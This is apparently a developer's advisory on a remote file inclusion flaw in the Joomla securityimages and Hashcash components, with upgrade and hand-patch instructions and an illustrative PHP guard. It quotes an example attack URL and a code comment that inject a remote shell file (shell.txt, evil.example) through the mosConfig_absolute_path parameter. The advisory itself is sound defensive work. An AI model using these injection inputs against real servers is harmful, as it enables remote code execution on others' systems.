
Security risk in securityimages


The webmaster of janwiersma.com sent me an email today
at 6:12AM: his server was hacked because of a bug in
securityimages. This bug allows a remote attacker to
execute arbitrary code on your server by forcing the
inclusion of a remote file (remote file inclusion),
and it affects ALL versions of securityimages <= 3.0.5

Here are all the files which put your server at risk:
client.php, configinsert.php, lang.php, server.php

Example of attack (from http://securityreason.com/exploitalert/892):
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
Secunia also has a report on it: http://secunia.com/product/11186/

In fact I forgot to use this line in these files:
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
This prevents any request from accessing the file directly, so the file only ever runs when loaded by Joomla itself.

– upgrade to 3.0.6 (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
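As an added illustration (not the actual securityimages source), here is a file in the shape of the affected entry points, showing the unguarded pattern the advisory describes next to the patched form; the included file name and the php.ini checks are assumptions for the example.

```php
<?php
// Added example of the affected pattern, not code from the component.
//
// Vulnerable form (what 3.0.5 and older shipped): the file can be
// requested directly, and if $mosConfig_absolute_path is filled from the
// request (PHP register_globals on, or any equivalent globals emulation)
// the include below fetches and executes whatever URL the attacker
// supplied, e.g. ?mosConfig_absolute_path=http://evil.example/shell.txt
//
//   require_once($mosConfig_absolute_path . '/configuration.php');
//
// Patched form (3.0.6 / the hand patch): Joomla 1.0 defines _VALID_MOS in
// its own index.php before loading any component, so a direct request to
// this file never has it defined and dies here, before any include runs.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// Defence in depth on the hosting side (assumed checks, not part of the
// patch): with remote includes disabled, a variable-driven include cannot
// reach an external URL even if a guard is missed somewhere else.
//   php.ini: allow_url_include = Off   (PHP >= 5.2; on older releases
//            allow_url_fopen = Off covers include as well)
//   php.ini: register_globals = Off    (removed entirely in PHP 5.4)
if (ini_get('allow_url_include')) {
    trigger_error('allow_url_include is On; remote includes are possible', E_USER_WARNING);
}
if (ini_get('register_globals')) {
    trigger_error('register_globals is On; request data can overwrite globals', E_USER_WARNING);
}

// Reached only when loaded through Joomla, with the path set by the CMS.
require_once($mosConfig_absolute_path . '/configuration.php');
```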

Please also contact all your friends who are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is available!

– upgrade to 1.2.2 (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

JoomlaCloud is NOT affected

YOU ARE ALL URGED TO UPGRADE ASAP!
